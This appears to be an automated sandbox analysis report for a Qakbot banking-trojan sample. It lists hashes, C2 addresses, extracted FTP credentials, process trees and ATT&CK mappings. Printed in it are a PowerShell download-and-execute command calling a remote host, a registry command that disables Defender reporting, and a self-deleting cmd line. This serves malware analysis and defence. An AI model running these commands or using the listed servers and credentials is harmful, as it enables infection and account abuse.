qakbot | 1ee6f8e9bbc53afa81c39326d5748c6c4322d2501c42adcb34f5b71bc34ae48b

General

Target

aatnj.exe
Size

39.5MB
MD5

2cf766692a75309734b08b3bd8cc36df
SHA1

a003224582db124237e8c879d795aefe8d23b22b
SHA256

1ee6f8e9bbc53afa81c39326d5748c6c4322d2501c42adcb34f5b71bc34ae48b
SHA512

a28bf5af4c30152bd89d23e5295e9a6faa23eac6f312d7841bfb4664fe725bf42fed2fe4bb65c164709d6aa98a5ff66cbb78ed86396be975d2aeb1386afcda2c

Score

10^/10

qakbot 1513068643 banker persistence stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.allens-treasure-house.com/books_files/001.ps1

Extracted

Family

qakbot

Campaign

1513068643

Credentials

Protocol: ftp
Host:
66.96.133.9
Port:
21
Username:
help
Password:
eT5TerAcnFe6~

Protocol: ftp
Host:
174.123.38.58
Port:
21
Username:
log@thebrainregistry.com
Password:
4BQ1MeeRAwNZEVu

Protocol: ftp
Host:
61.221.12.26
Port:
21
Username:
logger@ostergift.com
Password:
346HZGCMlwecz9S

Protocol: ftp
Host:
67.222.137.18
Port:
21
Username:
logger@grupocrepusculo.net
Password:
p4a8k6fE1FtA3pR

Protocol: ftp
Host:
107.6.152.61
Port:
21
Username:
logger@trussedup.com
Password:
RoP4Af0RKAAQ74V

C2

1.1.192.123:443

160.3.251.154:995

75.127.141.50:995

108.49.159.2:990

96.70.92.177:1194

70.184.255.4:443

73.171.50.80:443

98.201.98.191:443

104.159.220.171:443

100.8.244.14:443

66.76.136.65:443

24.45.150.163:443

216.201.159.118:443

66.76.136.65:1194

160.3.251.154:443

27.3.93.3:443

58.108.210.165:995

96.70.92.177:993

108.58.44.6:443

117.195.243.76:443

Signatures

Qakbot/Qbot
Qbot or Qakbot is a sophisticated worm with banking capabilities.
trojan banker stealer qakbot
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

6 644 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

qcubrqe.exeqcubrqe.exe

pid process

1376 qcubrqe.exe
864 qcubrqe.exe
Loads dropped DLL 2 IoCs

Processes:

aatnj.exe

pid process

292 aatnj.exe
292 aatnj.exe

flow	pid	process
6	644	powershell.exe

pid	process
1376	qcubrqe.exe
864	qcubrqe.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\eetqscnq = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Qcubrqec\\qcubrqe.exe\""	explorer.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2016 PING.EXE

pid	process
2016	PING.EXE

Suspicious behavior: EnumeratesProcesses 72 IoCs

Processes:

aatnj.exeaatnj.exeqcubrqe.exeqcubrqe.exepowershell.exeexplorer.exetaskhost.exeDwm.exeExplorer.EXEconhost.execmd.execonhost.exePING.EXE

pid	process
292	aatnj.exe
1540	aatnj.exe
1540	aatnj.exe
1376	qcubrqe.exe
864	qcubrqe.exe
644	powershell.exe
644	powershell.exe
864	qcubrqe.exe
656	explorer.exe
656	explorer.exe
1128	taskhost.exe
1232	Dwm.exe
1268	Explorer.EXE
292	aatnj.exe
644	powershell.exe
1476	conhost.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
2004	cmd.exe
1940	conhost.exe
2016	PING.EXE
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe
656	explorer.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

qcubrqe.exe

pid process

1376 qcubrqe.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 644 powershell.exe
Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

Explorer.EXE

pid process

1268 Explorer.EXE
1268 Explorer.EXE
1268 Explorer.EXE
1268 Explorer.EXE
Suspicious use of SendNotifyMessage 4 IoCs

Processes:

Explorer.EXE

pid process

1268 Explorer.EXE
1268 Explorer.EXE
1268 Explorer.EXE
1268 Explorer.EXE

pid	process
1376	qcubrqe.exe

description	pid	process
Token: SeDebugPrivilege	644	powershell.exe

pid	process
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE

pid	process
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE

Suspicious use of WriteProcessMemory 60 IoCs

Processes:

aatnj.exeqcubrqe.exeexplorer.execmd.exe

description	pid	process	target process
PID 292 wrote to memory of 1540	292	aatnj.exe	aatnj.exe
PID 292 wrote to memory of 1540	292	aatnj.exe	aatnj.exe
PID 292 wrote to memory of 1540	292	aatnj.exe	aatnj.exe
PID 292 wrote to memory of 1540	292	aatnj.exe	aatnj.exe
PID 292 wrote to memory of 1376	292	aatnj.exe	qcubrqe.exe
PID 292 wrote to memory of 1376	292	aatnj.exe	qcubrqe.exe
PID 292 wrote to memory of 1376	292	aatnj.exe	qcubrqe.exe
PID 292 wrote to memory of 1376	292	aatnj.exe	qcubrqe.exe
PID 292 wrote to memory of 272	292	aatnj.exe	reg.exe
PID 292 wrote to memory of 272	292	aatnj.exe	reg.exe
PID 292 wrote to memory of 272	292	aatnj.exe	reg.exe
PID 292 wrote to memory of 272	292	aatnj.exe	reg.exe
PID 292 wrote to memory of 644	292	aatnj.exe	powershell.exe
PID 292 wrote to memory of 644	292	aatnj.exe	powershell.exe
PID 292 wrote to memory of 644	292	aatnj.exe	powershell.exe
PID 292 wrote to memory of 644	292	aatnj.exe	powershell.exe
PID 1376 wrote to memory of 864	1376	qcubrqe.exe	qcubrqe.exe
PID 1376 wrote to memory of 864	1376	qcubrqe.exe	qcubrqe.exe
PID 1376 wrote to memory of 864	1376	qcubrqe.exe	qcubrqe.exe
PID 1376 wrote to memory of 864	1376	qcubrqe.exe	qcubrqe.exe
PID 1376 wrote to memory of 656	1376	qcubrqe.exe	explorer.exe
PID 1376 wrote to memory of 656	1376	qcubrqe.exe	explorer.exe
PID 1376 wrote to memory of 656	1376	qcubrqe.exe	explorer.exe
PID 1376 wrote to memory of 656	1376	qcubrqe.exe	explorer.exe
PID 1376 wrote to memory of 656	1376	qcubrqe.exe	explorer.exe
PID 656 wrote to memory of 1128	656	explorer.exe	taskhost.exe
PID 656 wrote to memory of 1128	656	explorer.exe	taskhost.exe
PID 656 wrote to memory of 1128	656	explorer.exe	taskhost.exe
PID 656 wrote to memory of 1232	656	explorer.exe	Dwm.exe
PID 656 wrote to memory of 1232	656	explorer.exe	Dwm.exe
PID 656 wrote to memory of 1232	656	explorer.exe	Dwm.exe
PID 656 wrote to memory of 1268	656	explorer.exe	Explorer.EXE
PID 656 wrote to memory of 1268	656	explorer.exe	Explorer.EXE
PID 656 wrote to memory of 1268	656	explorer.exe	Explorer.EXE
PID 656 wrote to memory of 292	656	explorer.exe	aatnj.exe
PID 656 wrote to memory of 292	656	explorer.exe	aatnj.exe
PID 656 wrote to memory of 292	656	explorer.exe	aatnj.exe
PID 656 wrote to memory of 644	656	explorer.exe	powershell.exe
PID 656 wrote to memory of 644	656	explorer.exe	powershell.exe
PID 656 wrote to memory of 644	656	explorer.exe	powershell.exe
PID 656 wrote to memory of 1476	656	explorer.exe	conhost.exe
PID 656 wrote to memory of 1476	656	explorer.exe	conhost.exe
PID 656 wrote to memory of 1476	656	explorer.exe	conhost.exe
PID 292 wrote to memory of 2004	292	aatnj.exe	cmd.exe
PID 292 wrote to memory of 2004	292	aatnj.exe	cmd.exe
PID 292 wrote to memory of 2004	292	aatnj.exe	cmd.exe
PID 292 wrote to memory of 2004	292	aatnj.exe	cmd.exe
PID 2004 wrote to memory of 2016	2004	cmd.exe	PING.EXE
PID 2004 wrote to memory of 2016	2004	cmd.exe	PING.EXE
PID 2004 wrote to memory of 2016	2004	cmd.exe	PING.EXE
PID 2004 wrote to memory of 2016	2004	cmd.exe	PING.EXE
PID 656 wrote to memory of 2004	656	explorer.exe	cmd.exe
PID 656 wrote to memory of 2004	656	explorer.exe	cmd.exe
PID 656 wrote to memory of 2004	656	explorer.exe	cmd.exe
PID 656 wrote to memory of 1940	656	explorer.exe	conhost.exe
PID 656 wrote to memory of 1940	656	explorer.exe	conhost.exe
PID 656 wrote to memory of 1940	656	explorer.exe	conhost.exe
PID 656 wrote to memory of 2016	656	explorer.exe	PING.EXE
PID 656 wrote to memory of 2016	656	explorer.exe	PING.EXE
PID 656 wrote to memory of 2016	656	explorer.exe	PING.EXE

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1268

C:\Users\Admin\AppData\Local\Temp\aatnj.exe
"C:\Users\Admin\AppData\Local\Temp\aatnj.exe"
2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:292

C:\Users\Admin\AppData\Local\Temp\aatnj.exe
"C:\Users\Admin\AppData\Local\Temp\aatnj.exe" /C
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1540

C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1376

C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe" /C
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:864

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:656

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
3⤵
PID:272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.allens-treasure-house.com/books_files/001.ps1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\dsgqusyinllxtjzempwebswphyar.txt'"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:644

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\aatnj.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2004

C:\Windows\SysWOW64\PING.EXE
ping.exe -n 6 127.0.0.1
4⤵
- Runs ping.exe
- Suspicious behavior: EnumeratesProcesses
PID:2016

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1232

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1128

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-19007207921145265970128245128521110818641071818068179498888-1386010726526966880"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1476

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1008628566724299117529814571568871720502565179-1509066441155205275116615787"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1940

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrq.dat
MD5
205dccc6f14473f9d0f627dd82b990e6

SHA1
b0da5441d278113fe1325b3abf23b31e9e695476

SHA256
9a1b7b5484d936382438484e1be23cfe4724f2de237d82c705cbe5215d722c42

SHA512
0d286fc012f951e1155ed985d8ea267a6bcf238c6f93bf0f928f4fba3d0d6a26c5f40472baba63a5fdecdf9acd6fb6b186f695bf2a6dc37f15bdc34e9c2b6196

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe
MD5
e8023ba3e33238f7d8afcf9edcb66dd5

SHA1
103806275b0bf9d81f5a160fff610977155f2bf5

SHA256
bb590da29b53a67165e55a7f34939979ceebb852753661a2befcfd3680dedcac

SHA512
6180cd06604f7d174c42dc64b7ce5cd305d7dfa69affd821784bb486b88d30128d19819c2476a27bb4eabd8ea03b93f6d025775230120fc8a05be8d690e985d1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe
MD5
e8023ba3e33238f7d8afcf9edcb66dd5

SHA1
103806275b0bf9d81f5a160fff610977155f2bf5

SHA256
bb590da29b53a67165e55a7f34939979ceebb852753661a2befcfd3680dedcac

SHA512
6180cd06604f7d174c42dc64b7ce5cd305d7dfa69affd821784bb486b88d30128d19819c2476a27bb4eabd8ea03b93f6d025775230120fc8a05be8d690e985d1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe
MD5
e8023ba3e33238f7d8afcf9edcb66dd5

SHA1
103806275b0bf9d81f5a160fff610977155f2bf5

SHA256
bb590da29b53a67165e55a7f34939979ceebb852753661a2befcfd3680dedcac

SHA512
6180cd06604f7d174c42dc64b7ce5cd305d7dfa69affd821784bb486b88d30128d19819c2476a27bb4eabd8ea03b93f6d025775230120fc8a05be8d690e985d1

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe
MD5
e8023ba3e33238f7d8afcf9edcb66dd5

SHA1
103806275b0bf9d81f5a160fff610977155f2bf5

SHA256
bb590da29b53a67165e55a7f34939979ceebb852753661a2befcfd3680dedcac

SHA512
6180cd06604f7d174c42dc64b7ce5cd305d7dfa69affd821784bb486b88d30128d19819c2476a27bb4eabd8ea03b93f6d025775230120fc8a05be8d690e985d1

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe
MD5
e8023ba3e33238f7d8afcf9edcb66dd5

SHA1
103806275b0bf9d81f5a160fff610977155f2bf5

SHA256
bb590da29b53a67165e55a7f34939979ceebb852753661a2befcfd3680dedcac

SHA512
6180cd06604f7d174c42dc64b7ce5cd305d7dfa69affd821784bb486b88d30128d19819c2476a27bb4eabd8ea03b93f6d025775230120fc8a05be8d690e985d1

Download Submit
memory/272-7-0x0000000000000000-mapping.dmp

Download
memory/292-26-0x0000000000580000-0x0000000000581000-memory.dmp

Filesize
4KB

Download
memory/644-16-0x0000000001F70000-0x0000000001F71000-memory.dmp

Filesize
4KB

Download
memory/644-17-0x0000000001ED0000-0x0000000001ED1000-memory.dmp

Filesize
4KB

Download
memory/644-9-0x0000000000000000-mapping.dmp

Download
memory/644-12-0x000007FEF5DD0000-0x000007FEF67BC000-memory.dmp

Filesize
9.9MB

Download
memory/644-14-0x0000000001D90000-0x0000000001D91000-memory.dmp

Filesize
4KB

Download
memory/644-15-0x000000001AE10000-0x000000001AE11000-memory.dmp

Filesize
4KB

Download
memory/644-44-0x00000000026C0000-0x00000000026C1000-memory.dmp

Filesize
4KB

Download
memory/644-28-0x00000000021B0000-0x00000000021B1000-memory.dmp

Filesize
4KB

Download
memory/644-24-0x000000001B8A0000-0x000000001B8A1000-memory.dmp

Filesize
4KB

Download
memory/644-43-0x0000000002570000-0x0000000002571000-memory.dmp

Filesize
4KB

Download
memory/644-31-0x0000000002600000-0x0000000002601000-memory.dmp

Filesize
4KB

Download
memory/656-20-0x0000000000000000-mapping.dmp

Download
memory/864-11-0x0000000000000000-mapping.dmp

Download
memory/864-18-0x0000000002480000-0x0000000002491000-memory.dmp

Filesize
68KB

Download
memory/1128-22-0x0000000001B70000-0x0000000001B71000-memory.dmp

Filesize
4KB

Download
memory/1376-6-0x0000000000000000-mapping.dmp

Download
memory/1376-19-0x0000000000E90000-0x0000000000EF8000-memory.dmp

Filesize
416KB

Download
memory/1540-3-0x0000000002480000-0x0000000002491000-memory.dmp

Filesize
68KB

Download
memory/1540-2-0x0000000000000000-mapping.dmp

Download
memory/2004-45-0x0000000000000000-mapping.dmp

Download
memory/2004-48-0x0000000000000000-mapping.dmp

Download
memory/2016-46-0x0000000000000000-mapping.dmp

Download
memory/2016-51-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads